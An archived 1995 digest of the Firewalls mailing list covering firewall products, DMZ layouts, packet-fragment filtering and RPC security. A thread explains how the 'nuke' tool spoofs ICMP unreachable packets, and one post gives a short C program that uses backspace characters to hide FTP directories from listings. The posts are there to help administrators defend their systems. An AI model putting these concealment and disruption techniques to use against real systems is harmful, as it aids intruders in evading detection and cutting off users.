(8.6.9/Miles-950430-1) with ESMTP id HAA01567 for ; Mon, 8 May 1995 07:04:15 -0700 Received: from jayhawk.mid.net (jayhawk.mid.net [198.247.250.21]) by noc1.mid.net (8.6.10/8.6.9) with ESMTP id JAA27195 for ; Mon, 8 May 1995 09:04:41 -0500 Received: (from alan@localhost) by jayhawk.mid.net (8.6.10/8.6.9) id JAA23381 for firewalls@greatcircle.com; Mon, 8 May 1995 09:04:59 -0500 From: Alan Hannan Message-Id: <199505081404.JAA23381@jayhawk.mid.net> Subject: Announce: Firewall SNMP mailing list To: firewalls@greatcircle.com Date: Mon, 8 May 1995 09:04:58 -0500 (CDT) X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 741 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Howdy. I have created a majordomo (Thanks Brent!) mailing list for the discussion of Firewall SNMP. It is my hope that this list can provide a forum through which a standardized SNMP MIB for firewalls can develop. I look forward to your discussions. subscribe: Send email to majordomo@mid.net with the text "subscribe fw-snmp" in the mailing list to send mail to the list: Send the mail to "fw-snmp@mid.net" -- alan@mid.net, (402) 472-0241 (voice) Networked Systems Administrator (402) 472-0240 (fax) MIDnet, the United States Oldest Regional Internet Service Provider " They that can give up essential liberty to obtain a little temporary safety deserve neither liberty nor safety. " - Benjamin Franklin From firewalls-owner Mon May 8 08:14:14 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA02154 for firewalls-outgoing; Mon, 8 May 1995 08:04:16 -0700 Received: from real.com (eagle.real.com [199.97.122.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA02149 for ; Mon, 8 May 1995 08:04:13 -0700 Date: Mon, 8 May 1995 08:42:03 -0400 From: bret@real.com (Bret McDanel) Received: by real.com (8.6.8.1/3.2.012693-Realistic Technologies Inc); id IAA25611 for firewalls@greatcircle.com; Mon, 8 May 1995 08:42:03 -0400 Message-Id: <199505081242.IAA25611@real.com> To: firewalls@greatcircle.com Subject: Re: nuke vs firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > From a Newbie: What is nuke? > > It is a kewl tool, which forces a shutdown of all the TCP/IP connections > to a system. All the users get disconnected. A detailed discussion of > exactly how to use the nuke/sniffer combination to get the user-id and > password of EVERYONE that uses the system really belongs in alt.2600. > Well, not quite.. It sends an ICMP host unreachable to a specific port.. You have to know which machine it should come from (ie you spoof the source addr).. This will work on 1 port per icmp packet.. it wont just blindly do em all.. There are kernel patches for this on suns, not sure about other machines, and tcp_info will tell you the machine that sent the packet, so you can try to figure out who is doing it.. From firewalls-owner Mon May 8 08:15:09 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA01629 for firewalls-outgoing; Mon, 8 May 1995 07:16:19 -0700 Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA01624 for ; Mon, 8 May 1995 07:16:02 -0700 Received: from relay.tis.com by relay4.UU.NET with SMTP id QQyovo05718; Mon, 8 May 1995 10:13:10 -0400 Received: from sol.tis.com(192.33.112.100) by relay.tis.com via smap (g3.0) id sma020295; Mon, 8 May 95 10:09:49 -0400 Received: from (illuminati.tis.com) by tis.com (4.1/SUN-5.64) id AA08083; Mon, 8 May 95 10:10:36 EDT Received: by (4.1/illuminati) id AA12166; Mon, 8 May 95 10:17:51 EDT From: "Marcus J. Ranum" Message-Id: <12166.9505081417@illuminati> Subject: Re: Source Code To: mcr@milkyway.com (Michael Richardson) Date: Mon, 8 May 1995 10:17:51 -0400 (EDT) Cc: hcb@clark.NET, firewalls@greatcircle.com In-Reply-To: <199505071614.MAA19029@metis.milkyway.com> from "Michael Richardson" at May 7, 95 12:14:58 pm Organization: Trusted Information Systems, Inc. Glenwood, MD Phone: 301-854-6889 Coredump: Infocalypse Now!!! Content-Type: text Content-Length: 2717 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk [WARNING: silliness below] >>Complain all you like about software; there's nothing like a >>beta test on your body! :-) > > The question is, Marcus, did S/HE use formal methods to design us? :-) This is an important and serious issue! I think that it's hard to say. There is contradictory evidence on both sides. Let me present it and you be the judge: The current design clearly has lots of error-correction and runtime error detection/termination built in. When genetic material is damaged, the cell (usually) dies; there are mechanisms built in to perform active defense against error conditions. The defenses and mechanisms occasionally get things "wrong" and fail. Intermittent failures such as Lupus and cancer argue that the system was not designed formally, *OR* that if it was designed with formal specifications, that the formalism was wrong. :) One thing people forget about formal specs is that they are *models* that attempt to prove that the *model* is self-consistent. The relationship between the model and reality is based largely on hope or "convincing argument.*" Formal does not mean "accurate" or "correct." I won't touch the evolution versus creation debate, other than to observe that evolution and formal methods appear to be mutually exclusive. :) Current humanity couldn't even reach B2, according to the Orange Book: B2: CHANGE: All discovered flaws shall be corrected and the TCB retested to demonstrate that they have been eliminated and that new flaws have not been introduced. To me the most convincing arguments have to do with time. If humanity had been designed using formal methods, we wouldn't even be in prerelease yet, let alone in production. The seven days, of course, might have been metaphorical: a seven day implementation period following billions and billions of years of design and specification. :) mjr. ---- (* The appendix of the Orange Book reads: Formal Proof - A complete and convincing mathematical argument, presenting the full logical justification for each proof step, for the truth of a theorem or set of theorems. The formal verification process uses formal proofs to show the truth of certain properties of formal specification and for showing that computer programs satisfy their specifications. A1: CHANGE: The FTLS shall be shown to be an accurate description of the TCB interface. A convincing argument shall be given that the DTLS is consistent with the model and a combination of formal and informal techniques shall be used to show that the FTLS is consistent with the model. This could be paraphrased as "proof by vigorous hand waving" ) From firewalls-owner Mon May 8 09:50:16 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA03017 for firewalls-outgoing; Mon, 8 May 1995 08:43:48 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA03010 for ; Mon, 8 May 1995 08:43:39 -0700 From: John_Reinke@pcmailgw.ml.com Received: from UVS1.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA09986; Mon, 8 May 95 08:46:08 -0400 Date: Mon, 8 May 95 08:46:08 -0400 Message-Id: <9505081246.AA09986@uvs1.orl.mmc.com> To: firewalls@greatcircle.com@uvs1.dnet.mmc.com Subject: Re: One Time Password Tokens Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Padgett, It may be appropriate to call the "firewall-ers" attention to this month's issue of Data Communications magazine which reviews several token solutions. Everyone appeared to have something the reviewer did not like. John Reinke This opinions are mine and not that of my employer -- a not clueless corporation -- just "thrifty"? _____________________________ Reply Separator _________________________________ Subject: One Time Password Tokens Author: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security) at PROFGTWY Date: 5/7/95 8:18 AM Basically there are two types of tokens today, time synchronous and challenge response. Both work well (one went white water rafting in Alaska with a SecurID in my wallet - it survived and have been using From firewalls-owner Mon May 8 10:02:26 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03339 for firewalls-outgoing; Mon, 8 May 1995 09:07:17 -0700 Received: from ACCDVM.ACCD.EDU (accdvm.accd.edu [204.158.0.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA03334 for ; Mon, 8 May 1995 09:07:12 -0700 From: ALVAREZ@ACCDVM.ACCD.EDU Message-Id: <199505081607.JAA03334@miles.greatcircle.com> Received: from ACCDVM.ACCD.EDU by ACCDVM.ACCD.EDU (IBM VM SMTP V2R2) with BSMTP id 7407; Mon, 08 May 95 11:07:28 CST Date: Mon, 8 May 95 11:07:27 CST To: Firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk subscrib From firewalls-owner Mon May 8 10:38:47 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA03261 for firewalls-outgoing; Mon, 8 May 1995 09:02:34 -0700 Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA03256 for ; Mon, 8 May 1995 09:02:31 -0700 Received: from wellspring.us.dg.com by dg-rtp.dg.com (5.4R2.01/dg-rtp-v02) id AA18565; Mon, 8 May 1995 09:47:10 -0400 Received: from immis184 by wellspring.us.dg.com (5.4.1/dg-gens08) id AA07146; Mon, 8 May 1995 09:47:07 -0400 Message-Id: <9505081347.AA07146@wellspring.us.dg.com> Comments: Authenticated sender is From: "Jim Carroll" Organization: Data General (Canada) Inc. To: firewalls@greatcircle.com (Firewalls Mailing List) Date: Mon, 8 May 1995 09:47:02 -0500 Subject: security of RPC Reply-To: jcarroll@wellspring.us.dg.com Priority: normal X-Mailer: Pegasus Mail for Windows (v2.0-WB1) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On 8 May 95 at 0:26, Matthew K was heard to utter: > SecureRPC has a mechanism that does exactly this.. has done for > years, and yes RPC is available for platforms other than Un*x I've been meaning to ask this one for a while. Now is as good a time as any. I thought RPC-based servers used dynamically assigned ports. If this is true, then isn't SecureRPC an oxymoron? (Honest question - no sarcasm intended.) -- Jim Carroll - jcarroll@wellspring.us.dg.com ... the usual disclaimers ... ## Life is like a boxing chocolate ## From firewalls-owner Mon May 8 10:49:39 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA04417 for firewalls-outgoing; Mon, 8 May 1995 10:29:38 -0700 Received: from uuneo.neosoft.com (uuneo.NeoSoft.COM [198.64.6.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA04410 for ; Mon, 8 May 1995 10:29:35 -0700 Received: from ris1.UUCP (jabrwock@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id MAA22514 for GreatCircle.COM!firewalls; Mon, 8 May 1995 12:10:28 -0500 Received: by ris1.nmti.com (smail2.5) id AA11669; 8 May 95 10:35:33 CDT (Mon) Received: by sonic.nmti.com; id AA08745; Mon, 8 May 1995 10:56:03 -0500 From: peter@nmti.com (Peter da Silva) Message-Id: <9505081556.AA08745@sonic.nmti.com.nmti.com> Subject: Re: fw newbie needs validat To: firewalls@GreatCircle.COM Date: Mon, 8 May 1995 10:56:02 -0500 (CDT) In-Reply-To: <199505081349.JAA27112@biko.llc.org> from "Martin Durand" at May 8, 95 09:49:33 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 503 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Why don't you spend some more and get the commercial BSDI Unix instead of > FreeBie-SD ? I run FreeBSD and BSDI both, and I'm a pretty competant UNIX weenie... I'm currently supporting OSF/1, SunOS, Solaris, System V R3 and R4, and Xenix-286 as well as BSD... and FreeBSD is at least as solid as BSDI, and much more so than anything else I work with. I've got BSDI on my firewall and more than once I've wished it was FreeBSD instead. FreeBSD is in no wise a step down from BSDI or commercial UNIX. From firewalls-owner Mon May 8 11:14:53 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA04685 for firewalls-outgoing; Mon, 8 May 1995 10:48:32 -0700 Received: from armitage.cyberspace.com (armitage.cyberspace.com [199.2.48.15]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA04680 for ; Mon, 8 May 1995 10:48:28 -0700 Received: from case (case.cyberspace.com) by armitage.cyberspace.com (4.1/SMI-4.1) id AA13614; Mon, 8 May 95 10:48:35 PDT Date: Mon, 8 May 95 10:48:35 PDT From: billcurr@cyberspace.com (Bill Curr) Message-Id: <9505081748.AA13614@armitage.cyberspace.com> Received: by case (4.1/SMI-4.1) id AA14534; Mon, 8 May 95 10:49:44 PDT Subject: BorderWare (previously "JANUS") To: Firewalls@GreatCircle.COM X-Mailer: AIR Mail 3.X (SPRY, Inc.) With all the discussions about different FW products, I hace yet to see Sender: firewalls-owner@GreatCircle.COM Precedence: bulk mention of a product previously known as "JANUS" but now called "BorderWare FireWall Server." Does anyone have experience or input they care to share on this product? Thanks in advance! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- "Printmaker gone digital" billcurr@cyberspace.com http://www.cyberspace.com/billcurr -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- From firewalls-owner Mon May 8 11:42:43 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA05134 for firewalls-outgoing; Mon, 8 May 1995 11:17:07 -0700 Received: from relay1.UU.NET (relay1.UU.NET [192.48.96.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA05128 for ; Mon, 8 May 1995 11:16:59 -0700 Received: from mail.orkand.com by relay1.UU.NET with SMTP id QQyowf10261; Mon, 8 May 1995 14:15:11 -0400 Received: from cc:Mail SMTPLINK 2.1 by mail.orkand.com id AA799957921; Mon, 08 May 95 11:29:27 EST Date: Mon, 08 May 95 11:29:27 EST From: "Michael L. Sapp" Encoding: 37 Text Message-Id: <9504087999.AA799957921@mail.orkand.com> To: firewalls@greatcircle.com Subject: Re: IP Packet Filtering Sender: firewalls-owner@GreatCircle.COM Precedence: bulk So it has been written... >>I'd like to suggest that anyone who filters by port or the "established" >>bit in their firewall add a rule which works *before* anything which might >>match that description to drop _all_ fragmented IP packets. They can pose >>a very large problem and rather than speculate about whether your vendor's >>filtering does it "right" or can handle it at all, it is better to just >>make yourself immune. >> >>I can't see anything in the FAQ about this and it has been quite a while >>since I have seen anyone ask about this. > > Wait a sec... What's the problem with fragmented packets? Most filtering > systems apply filtering only to the first fragment, and simply let all > non-first fragments through. The assumption is that, if the filtering > system decides to drop the first fragment, it doesn't matter if the rest > get through, because the destination system won't be able to reassemble the > packet without the first fragment. It doesn't depend on the destination's > implementation; if the destination never sees the first fragment, it simply > _can't_ reassemble the packet, because it doesn't have all the data. Ok, so now we have had a nice little technical/philosophical discussion on this point ;) I have a real question before I decide which side to join ranks. Can I do this kind of filtering (dropping fragments that is) on a Cisco router with a recent software rev? I'm always looking for ways to improve my front line packet filter. Sorry for cutting to the chase so soon... Mike Sapp Director, Computer Center The Orkand Corporation msapp@orkand.com The usual legal stuff would go here...if my employer knew enough to care. From firewalls-owner Mon May 8 12:18:00 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA05418 for firewalls-outgoing; Mon, 8 May 1995 11:38:45 -0700 Received: from ban-unix.os.dhhs.gov (B11WDC-IR06B.os.dhhs.gov [158.70.252.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA05413 for ; Mon, 8 May 1995 11:38:43 -0700 Received: FROM X400MTA.ban-unix.os.dhhs.gov BY ban-unix.os.dhhs.gov ; 8 MAY 95 14:39:21 EDT Date: 8 MAY 95 08:06:44 EDT From: GFortwen@os.dhhs.gov Subject: re: Firewall-1 Pros and Cons To: firewalls@GreatCircle.COM MIME-Version: 1.0 X-Mailer: 2.3.5 ZOOMIT X.400/SMTP Dual Stack X-Complete-Subject: re: Firewall-1 Pros and Cons Message-ID: <0000rpddzfjp.0000qyaeqiiy@os.dhhs.gov> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am also interested in any information anyone may have. George Fortwengler gfortwen@os.dhhs.gov Voice: (202) 690-5704 Fax : (202) 651-7401 From firewalls-owner Mon May 8 12:18:58 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA05579 for firewalls-outgoing; Mon, 8 May 1995 11:50:20 -0700 Received: from ees1a0.engr.ccny.cuny.edu (ees1a0.engr.ccny.cuny.edu [134.74.16.18]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id LAA05574 for ; Mon, 8 May 1995 11:50:15 -0700 Received: by ees1a0.engr.ccny.cuny.edu (4.1/SMI-4.1-940815-1) id AA16754; Mon, 8 May 95 14:50:06 EDT Date: Mon, 8 May 1995 14:50:05 -0400 (EDT) From: Dan Schlitt To: Bret McDanel Cc: firewalls@greatcircle.com Subject: Re: nuke vs firewalls In-Reply-To: <199505081242.IAA25611@real.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The version of nuke which was left on one of our machines by a cracker seemed to be pretty flexible in the kind of ICMP packets that it could generate. The default was as you describe but the possibilites looked to be pretty broad. /dan -- Dan Schlitt School of Engineering Computer Systems dan@ee-mail.engr.ccny.cuny.edu City College of New York (212)650-6760 New York, NY 10031 From firewalls-owner Mon May 8 12:19:56 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA05973 for firewalls-outgoing; Mon, 8 May 1995 12:05:24 -0700 Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA05967 for ; Mon, 8 May 1995 12:05:21 -0700 Received: from brittany.oes.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0s8Y7q-0002IqC; Mon, 8 May 95 12:05 PDT Received: by brittany.oes.amdahl.com (5.0/SMI-4.1/DNS) id AA20987; Mon, 8 May 1995 12:05:46 +0800 Date: Mon, 8 May 1995 12:05:46 +0800 From: patrick@oes.amdahl.com (Patrick Horgan) Message-Id: <9505081905.AA20987@brittany.oes.amdahl.com> To: chris@sandpiper.com Subject: Re: Help with begining options? Cc: firewalls@greatcircle.com X-Sun-Charset: US-ASCII content-length: 2247 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I got several requests for more information about how people can hide directories in your ftp site. Here's some simple examples. > I am not quite sure what you mean by this. I tried mkdir "a b" and mkdir " " > and both were 'visible' with ls. How am I misunderstanding you? Yes, as I stated in the original post, there's still a space left for it in the listing. It's not at all obvious how to cd to it, rmdir it etc... Furthermore, it's often missed in a casual listing. The thing I was talking about are directory names like " \b". This shows no clue. It could also be something like, "hack\b\b\bdir\b\b" which would show as "hd" this is almost impossible to deal with, unless you treat it as h*d*, but how would you know to do that? Here's a small program that illustrates it: main(int argc, char **argv) { mkdir("my\b\bhack\b\b\bdir\b\b", 0777); } Makefile ipval.C test* testC.o add_tabs.c math.C test.cc testREUSE.cc binout.cc memsize.C test.o testc* date.C hd/ test.sh* testc.c hw1.1* rmit.c testC* time.C hw1.1.cc strang_proto.c testC.cc timers.C You can see the alignment problems that show up. Unfortunately most people would be unaware of the true significance of this and not realise that 14 characters are not shown, the 7 backspaces, and the 7 characters they erased. They think that they are hitting some weird bug in ls. If you know the secret you can get in quite easily, for example with this one, using my*. Patrick _______________________________________________________________________ / These opinions are mine, and not Amdahl's (except by coincidence;). \ | (\ | | Patrick J. Horgan Amdahl Corporation \\ Have | | patrick@amdahl.com 1250 East Arques Avenue \\ _ Sword | | Phone : (408)992-2779 P.O. Box 3470 M/S 316 \\/ Will | | FAX : (408)773-0833 Sunnyvale, CA 94088-3470 _/\\ Travel | \___________________________O16-2294________________________\)__________/ From firewalls-owner Mon May 8 12:21:01 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA05742 for firewalls-outgoing; Mon, 8 May 1995 11:56:59 -0700 Received: from peritus.com (benden.peritus.com [199.26.190.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA05728 for ; Mon, 8 May 1995 11:56:53 -0700 Received: from minerva.westboro-ma.peritus.com (minerva.westboro-ma.peritus.com [199.26.191.70]) by peritus.com (sendmail 8.6.12/Peritus-3.0) with ESMTP for id OAA05067; Mon, 8 May 1995 14:38:27 -0400 Date: Mon, 8 May 1995 14:38:25 -0400 From: peterson@minerva.westboro-ma.peritus.com (David Peterson) Received: by minerva.westboro-ma.peritus.com (8.6.9/Peritus-3.0) id OAA03705; Mon, 8 May 1995 14:38:25 -0400 Message-Id: <199505081838.OAA03705@minerva.westboro-ma.peritus.com> To: Firewalls@GreatCircle.COM Subject: Re: Help with begining options? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk patrick@oes.amdahl.com (Patrick Horgan) writes: > Hello Ben. > > >My current design consists of a router to connect to the 56k or ISDN link. > >The router dumps into a unsecure subnet that consists of whatever > >sacraficial lamb machines I have serving the outside word, and the Firewall. > > Here's a danger. You sometimes hear people talk about sacrificial lamb > machines, (anyone know the reference for the first occurance?) It's a > real danger to think this way. These machines are the closest machines > on the internet to your "secure" machines. That means that their security > profile should be as high as your firewall. If they aren't EXTREMELY > secure, you're letting all sorts of riff-raff set up shop on your > doorstep. The least consequence of this is that you'll be embarrassed > when a security officer at another shop calls you up and wants to know > why an attack is originating from one of your machines, or a court > order is served seizing one or more of your machines because they > harbor stolen software, (warez d00d!) How about finding out that > someone is snooping all the passwords of all the users logging into > machines on your site from outside, or vice-versa? Please be careful:) Here's a design that should reduce the threat to you in case the public (sacrificial lamb) host is compromised: +-----------+ +---------+ Internet ---------| Screening |------------| Bastion |-------- Internal Provider sync1| Router |enet1 | Host | Network +-----------+ +---------+ |enet2 | +--------+ | Public | | Host | +--------+ The screening router applies its filtering rules to the sync1 and enet2 interfaces. At a minimum, source-spoofed packets and dangerous ICMP packets such as REDIRECTs should be rejected. In this scenario, compromising the public host does not compromise either the internal network or the legitimate connections from the bastion host to the Internet. It can still give you a 'public relations' black eye or be used to launch attacks back out into the Internet, but these are different problems. --- David Peterson | I have sworn, upon the alter of God, eternal Peritus Software Services | hostility against every form of tyranny over dpeterson@peritus.com | the mind of man. | --Thomas Jefferson peterson@warpdrive.Milford.MA.US | Opinions expressed within: Mine! All Mine! From firewalls-owner Mon May 8 12:40:26 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA07164 for firewalls-outgoing; Mon, 8 May 1995 12:23:20 -0700 Received: from bootes.sds.no (bootes.sds.no [139.105.192.91]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA07149 for ; Mon, 8 May 1995 12:22:53 -0700 Received: by bootes.sds.no (5.65/DEC-Ultrix/4.3) id AA16236; Mon, 8 May 1995 21:23:22 +0200 Date: Mon, 8 May 1995 21:25:10 CST From: toreh Subject: Re: Pentagon security professionals To: firewalls@greatcircle.com Message-Id: Priority: Normal Mime-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 3 May 1995 22:42:01 -0400 (EDT) Dr. Frederick B. Cohen wrote: > From: Dr. Frederick B. Cohen > Date: Wed, 3 May 1995 22:42:01 -0400 (EDT) > Subject: Pentagon security professionals > To: firewalls@greatcircle.com > > Boy - you firewallers are touchy aren't you. Someone makes a > few comments about national security and everyone hops on the posting > party like they were posting something more interesting and open > discussion of such things is somehow wrong. I thought the posting was > entirely appropriate but then many of my postings are hated as well. So > here's my nickle: > > DISA is generally far better at security than that example > showed. Furthermore, they are understaffed and overworked and defending > our country (the US) against ongoing attacks. If you're not from the US > try not to be offended by a little bit of patriotism. Our country needs > defending and we help to defend much of the rest of the world. Boy, you sure are taking it on! Defending us from the martians? > -- tore From firewalls-owner Mon May 8 13:13:01 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA06240 for firewalls-outgoing; Mon, 8 May 1995 12:15:01 -0700 Received: from orpheus.amdahl.com (orpheus.amdahl.com [129.212.11.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA06231 for ; Mon, 8 May 1995 12:14:59 -0700 Received: from brittany.oes.amdahl.com by orpheus.amdahl.com with smtp (Smail3.1.29.1 #1) id m0s8YHA-0001ENC; Mon, 8 May 95 12:15 PDT Received: by brittany.oes.amdahl.com (5.0/SMI-4.1/DNS) id AA21031; Mon, 8 May 1995 12:15:30 +0800 Date: Mon, 8 May 1995 12:15:30 +0800 From: patrick@oes.amdahl.com (Patrick Horgan) Message-Id: <9505081915.AA21031@brittany.oes.amdahl.com> To: firewalls@greatcircle.com Subject: Announcing the list on firewalls. X-Sun-Charset: US-ASCII content-length: 1181 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk There's a new list set up for discussing, and creating a firewall mib(s). The list server was kindly set up by Michael Richardson, mcr@milkyway.com, and we will soon start discussion on it. To join the list, send mail to Majordomo@milkyway.com, with this in the body: subscribe firewall-mib end I invite all interested parties to participate or lurk, I hope we'll have someone from CheckPoint Technologies on the team since they've already done some work in this area, and I would think would have an interest in promoting their work into a standard. Patrick _______________________________________________________________________ / These opinions are mine, and not Amdahl's (except by coincidence;). \ | (\ | | Patrick J. Horgan Amdahl Corporation \\ Have | | patrick@amdahl.com 1250 East Arques Avenue \\ _ Sword | | Phone : (408)992-2779 P.O. Box 3470 M/S 316 \\/ Will | | FAX : (408)773-0833 Sunnyvale, CA 94088-3470 _/\\ Travel | \___________________________O16-2294________________________\)__________/ From firewalls-owner Mon May 8 14:14:12 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA20540 for firewalls-outgoing; Mon, 8 May 1995 13:40:20 -0700 Received: from netcom16.netcom.com (netcom16.netcom.com [192.100.81.129]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA20465 for ; Mon, 8 May 1995 13:40:15 -0700 From: Ruiyuan_Jiang/Advantage_KBS_at_LotusXchg@njcorp.akbs.com Received: from njcorp.akbs.com by netcom16.netcom.com (8.6.12/Netcom) id NAA28158; Mon, 8 May 1995 13:39:39 -0700 Received: from cc:Mail by njcorp.akbs.com id AA799976284; Mon, 08 May 95 16:37:00 EST Date: Mon, 08 May 95 16:37:00 EST Encoding: 44 Text Message-Id: <9504087999.AA799976284@njcorp.akbs.com> To: firewalls@greatcircle.com Subject: Re: fw newbie needs validation Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sorry, Martin, I can not give you an answer but I have a question about your draft picture. Between your two Cisco routers is your firewall bastion, the question is on your firewall bastion are there two network cards or just one network card. I mean if you use two network cards then one connects to Cisco 2504 and the other one connects to Cisco 1003 in this situation there is no direct connection between Cisco 2504 and Cisco 1003 and all the traffic passes firewall bastion. If your firewall bastion just has one network card connects then Cisco 2504 and Cisco 1003 has direct connection. I read the book "Firewalls and Internet Security" and the pictures on the book look like two routers (one is firewall) has direct connection. Can anyone clear my mind? Thanks ---------------------- Reply Separator --------------------- We are about to get connected and the IS guys are nervous about their data so they insist on a firewall. My budget is almost nil so we'll probably go with TIS's fwtk running over FreeBSD 2.0. If I understood what I gathered here and in Cheswick & Bellovin, our setup would look like this: +-------------+ +---------+ | | Inside nets,|---| Cisco |----| +----------+ | servers... | | 2504 | |---| Cisco |----- Internet +-------------+ | Eth-Eth | | | 1003 | +---------+ | | Eth-ISDN | | +----------+ +---------+ | |Firewall/|----| |Bastion | | |(fwtk) | | +---------+ With static routes between the 1003<->firewall and 2504<->firewall. Anything heretic/dumb/screwed/laughable... about this ? __________________________. Martin Durand | I know I should be working on my .sig file, nit@llc.org | but who reads these things... From firewalls-owner Mon May 8 15:58:58 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA05104 for firewalls-outgoing; Mon, 8 May 1995 14:52:06 -0700 Received: from delphi.cert.org (delphi.cert.org [192.88.210.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA05092 for ; Mon, 8 May 1995 14:52:01 -0700 Received: (from mjw@localhost) by delphi.cert.org (8.6.10/8.6.9) id RAA15597; Mon, 8 May 1995 17:54:37 -0400 Message-Id: <199505082154.RAA15597@delphi.cert.org> From: Moira West-Brown Subject: E-Mail response expectation. To: Firewalls@GreatCircle.COM Date: Mon, 8 May 95 17:54:36 EDT Reply-To: Moira West-Brown Sender: firewalls-owner@GreatCircle.COM Precedence: bulk [This is an automated reply.] Your message has been received, however I am out of the office between Tuesday 9th May and Friday May 12th. During that time I may only have limited access e-mail. If your message was regarding CERT business and if it was not sent (or cc'd) to "cert@cert.org", your message will go unaddressed until I return. Please resend any CERT-related e-mail to cert@cert.org so that CERT staff can review it and follow up if appropriate. Regards Moira Moira J. West-Brown Manager, Incident Handling CERT Coordination Center | Telephone: +1-412-268-7090 24-hour hotline Software Engineering Institute | CERT Coordination Center personnel answer Carnegie Mellon University | business days 08:30-17:00 EST/EDT Pittsburgh, PA 15213-3890 | (GMT-5)/(GMT-4), on call for emergencies U.S.A. | during other hours. Internet E-mail: cert@cert.org | Fax: +1-412-268-6989 From firewalls-owner Mon May 8 16:09:10 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA06006 for firewalls-outgoing; Mon, 8 May 1995 15:31:31 -0700 Received: from gold.chem.hawaii.edu (gold.chem.Hawaii.Edu [128.171.55.9]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA06001 for ; Mon, 8 May 1995 15:31:28 -0700 Received: by gold.chem.hawaii.edu (4.1/gold-MX-1.9) id AA18927; Mon, 8 May 95 12:31:39 HST Date: Mon, 8 May 1995 12:30:40 -1000 (HST) From: NetSurfer Subject: Re: PC site security To: "S. Alexander Jacobson" Cc: Gil Tennant , firewalls@GreatCircle.COM In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Re Chamelion 4.5 and netware drives - I'll email them separately and ask. -NetSurfer #include >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> == = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 > " " 